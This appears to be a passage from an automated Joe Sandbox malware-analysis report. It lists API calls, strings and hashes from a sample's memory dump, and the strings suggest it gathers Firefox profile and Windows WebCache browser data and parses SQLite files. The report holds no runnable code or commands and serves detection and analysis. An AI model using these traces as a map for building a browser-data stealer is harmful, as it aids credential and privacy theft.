                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                      • API String ID: 1534475566-1174173950
                                                                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                      APIs
                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                      • API String ID: 71295984-2036018995
                                                                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                      • String ID: "%s"
                                                                                      • API String ID: 1343145685-3297466227
                                                                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                      • API String ID: 1714573020-3385500049
                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                      APIs
                                                                                      • ??3@YAXPAX@Z.MSVCRT(021C0048), ref: 0044DF01
                                                                                      • ??3@YAXPAX@Z.MSVCRT(021D0050), ref: 0044DF11
                                                                                      • ??3@YAXPAX@Z.MSVCRT(00606D38), ref: 0044DF21
                                                                                      • ??3@YAXPAX@Z.MSVCRT(021D0458), ref: 0044DF31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID: 8m`
                                                                                      • API String ID: 613200358-1222121864
                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                      • memset.MSVCRT ref: 00408828
                                                                                      • memset.MSVCRT ref: 00408840
                                                                                      • memset.MSVCRT ref: 00408858
                                                                                      • memset.MSVCRT ref: 00408870
                                                                                      • memset.MSVCRT ref: 00408888
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 2911713577-0
                                                                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmp
                                                                                      • String ID: @ $SQLite format 3
                                                                                      • API String ID: 1475443563-3708268960
                                                                                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                      APIs
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@
                                                                                      • String ID: 8m`
                                                                                      • API String ID: 1033339047-1222121864
                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpqsort
                                                                                      • String ID: /nosort$/sort
                                                                                      • API String ID: 1579243037-1578091866
                                                                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                      Strings
                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                      • API String ID: 2887208581-2114579845
                                                                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                      APIs
                                                                                      Strings
                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                      • API String ID: 2221118986-1725073988
                                                                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                      APIs
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??3@DeleteObject
                                                                                      • String ID: r!A
                                                                                      • API String ID: 1103273653-628097481
                                                                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                      APIs
                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$memcmp
                                                                                      • String ID: $$8
                                                                                      • API String ID: 2808797137-435121686
                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                      Strings
                                                                                      • duplicate column name: %s, xrefs: 004307FE
                                                                                      • too many columns on %s, xrefs: 00430763
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: duplicate column name: %s$too many columns on %s
                                                                                      • API String ID: 0-1445880494
                                                                                      • Opcode ID: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                                      • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                      • Opcode Fuzzy Hash: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                                      • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                      APIs
                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1979745280-0
                                                                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
